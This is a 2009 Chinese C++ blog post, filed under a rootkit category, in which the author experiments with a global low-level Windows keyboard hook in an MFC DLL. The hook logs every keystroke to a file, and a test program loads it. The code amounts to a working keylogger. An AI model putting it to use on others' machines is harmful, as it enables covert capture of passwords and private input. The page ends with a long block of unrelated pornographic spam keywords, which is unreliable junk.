• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            S.l.e!ep.¢%

            像打了激速一樣,以四倍的速度運轉,開心的工作
            簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
            posts - 1098, comments - 335, trackbacks - 0, articles - 1
              C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

            About ShutDown of Windows(四)

            Posted on 2009-11-17 21:54 S.l.e!ep.¢% 閱讀(213) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
            接著 About ShutDown of Windows(三)
            折騰著,沒多大收獲

            Create 了一個 MFC 的DLL

            CHookDLLApp?theApp;

            HHOOK?g_Hook?
            =?NULL;

            LRESULT?CALLBACK?MyKeyHook(
            int?code,?WPARAM?wParam,?LPARAM?lParam)
            {
            #if?(_WIN32_WINNT?<?0x0400)
            /*
            *?Structure?used?by?WH_KEYBOARD_LL
            ????
            */
            ????typedef?
            struct?tagKBDLLHOOKSTRUCT?{
            ????????DWORD???vkCode;
            ????????DWORD???scanCode;
            ????????DWORD???flags;
            ????????DWORD???time;
            ????????DWORD???dwExtraInfo;
            ????}?KBDLLHOOKSTRUCT,?FAR?
            *LPKBDLLHOOKSTRUCT,?*PKBDLLHOOKSTRUCT;
            #endif
            ????
            ????PKBDLLHOOKSTRUCT?kbDLLHOOK?
            =?(PKBDLLHOOKSTRUCT)lParam;
            ????
            ????
            const?char?*info?=?NULL;
            ????
            ????
            if?(wParam?==?WM_KEYDOWN)
            ????????info?
            =?"key?down";????
            ????
            else?if?(wParam?==?WM_KEYUP)
            ????????info?
            =?"key?up";
            ????
            else?if?(wParam?==?WM_SYSKEYDOWN)
            ????????info?
            =?"sys?key?down";????
            ????
            else?if?(wParam?==?WM_SYSKEYUP)
            ????????info?
            =?"sys?key?up";
            ????
            ????FILE
            *?f?=?fopen("hook.txt",?"a+");
            ????
            ????CString?strLog;
            ????strLog.Format(
            "%s?-?vkCode?[%04x],?[%c]?scanCode?[%04x]\n",?info,?kbDLLHOOK->vkCode,?kbDLLHOOK->vkCode,?kbDLLHOOK->scanCode);
            ????
            ????fwrite(strLog,?
            1,?strLog.GetLength(),?f);
            ????fclose(f);
            ????
            ????
            //?always?call?next?hook
            ????return?CallNextHookEx(g_Hook,?code,?wParam,?lParam);
            }??????


            void?Hook()
            {
            ????
            //?TODO:?Add?extra?initialization?here
            #ifndef?WH_KEYBOARD_LL
            #define?WH_KEYBOARD_LL?13
            #endif

            ????g_Hook?
            =?SetWindowsHookEx(WH_KEYBOARD_LL,?MyKeyHook,?AfxGetApp()->m_hInstance,?0);
            ????
            ????
            if(?g_Hook?==?NULL?)
            ????????AfxMessageBox(
            "Failed?to?Set?Hook");

            }

            ;?HookDLL.def?:?Declares?the?module?parameters?for?the?DLL.

            LIBRARY??????
            "HookDLL"
            DESCRIPTION??
            'HookDLL?Windows?Dynamic?Link?Library'

            EXPORTS
            ????;?Explicit?exports?can?go?here
            ????Hook?????????@
            1

            Create 了一個MFC的工程

            BOOL?CHookTestDlg::OnInitDialog()
            {
            ????CDialog::OnInitDialog();

            ????
            //?Add?"About"?menu?item?to?system?menu.

            ????
            //?IDM_ABOUTBOX?must?be?in?the?system?command?range.
            ????ASSERT((IDM_ABOUTBOX?&?0xFFF0)?==?IDM_ABOUTBOX);
            ????ASSERT(IDM_ABOUTBOX?
            <?0xF000);

            ????CMenu
            *?pSysMenu?=?GetSystemMenu(FALSE);
            ????
            if?(pSysMenu?!=?NULL)
            ????{
            ????????CString?strAboutMenu;
            ????????strAboutMenu.LoadString(IDS_ABOUTBOX);
            ????????
            if?(!strAboutMenu.IsEmpty())
            ????????{
            ????????????pSysMenu
            ->AppendMenu(MF_SEPARATOR);
            ????????????pSysMenu
            ->AppendMenu(MF_STRING,?IDM_ABOUTBOX,?strAboutMenu);
            ????????}
            ????}

            ????
            //?Set?the?icon?for?this?dialog.??The?framework?does?this?automatically
            ????
            //??when?the?application's?main?window?is?not?a?dialog
            ????SetIcon(m_hIcon,?TRUE);????????????//?Set?big?icon
            ????SetIcon(m_hIcon,?FALSE);????????//?Set?small?icon
            ????
            ????
            //?TODO:?Add?extra?initialization?here
            #ifndef?WH_KEYBOARD_LL
            ????
            #define?WH_KEYBOARD_LL?13
            #endif
            ????
            //?????g_Hook?=?SetWindowsHookEx(WH_KEYBOARD_LL,?MyKeyHook,?AfxGetApp()->m_hInstance,?0);
            //?????
            //?????if(?g_Hook?==?NULL?)
            //?????????AfxMessageBox("Failed?to?Set?Hook");

            ????TCHAR?szPath[MAX_PATH]?
            =?{0};
            ????GetModuleFileName(NULL,?szPath,?MAX_PATH);
            ????PathRenameExtension(szPath,?_T(
            ""));

            ????typedef?
            void?(*TYPE_pfnLoadLibrary)();
            ????TYPE_pfnLoadLibrary?pfnLoadLibrary?
            =?NULL;

            ????HMODULE?Module?
            =?LoadLibrary(szPath);
            ????pfnLoadLibrary?
            =?(TYPE_pfnLoadLibrary)GetProcAddress(Module,?"Hook");
            ????
            ????pfnLoadLibrary();

            ????
            return?TRUE;??//?return?TRUE??unless?you?set?the?focus?to?a?control
            }

            時間太緊,沒做一些異常判斷處理
            HOOK成功了,用 SysCheck 工具一看, 只看到了 HookTest.exe 里面加載了一個HookDLL.dll

            采用 injecteddll 工具也沒有看到所謂的“注入”DLL

            是否“注入”成功,不得所知
            所謂的“注入”又該怎么看到的呢?明天再解決它。
            青春久久| 久久不见久久见免费视频7| 18岁日韩内射颜射午夜久久成人| 韩国无遮挡三级久久| 岛国搬运www久久| 国产激情久久久久久熟女老人| 91久久婷婷国产综合精品青草| 国产午夜精品理论片久久影视| 合区精品久久久中文字幕一区| 亚洲伊人久久精品影院| a级毛片无码兔费真人久久| 东方aⅴ免费观看久久av| 久久久国产精华液| 久久综合九色综合97_久久久| 久久久精品国产免大香伊| 国产日韩久久久精品影院首页| 久久精品国产2020| 久久青青草原精品国产不卡| 蜜臀av性久久久久蜜臀aⅴ麻豆| 四虎影视久久久免费观看| 91精品国产综合久久精品| 亚洲精品国精品久久99热一| 日本久久中文字幕| 久久99精品国产麻豆婷婷| 狠狠88综合久久久久综合网| 一本一本久久A久久综合精品| 欧美一级久久久久久久大片 | 久久99热这里只有精品国产| 国产一级持黄大片99久久| 亚洲AV无码久久精品蜜桃| 精品一二三区久久aaa片| 久久国产免费直播| 日韩va亚洲va欧美va久久| 久久精品一区二区影院| 久久亚洲av无码精品浪潮| 国产精品一区二区久久精品无码 | 久久亚洲精精品中文字幕| 一本一道久久a久久精品综合| 99久久精品这里只有精品| 久久免费视频1| 三级韩国一区久久二区综合|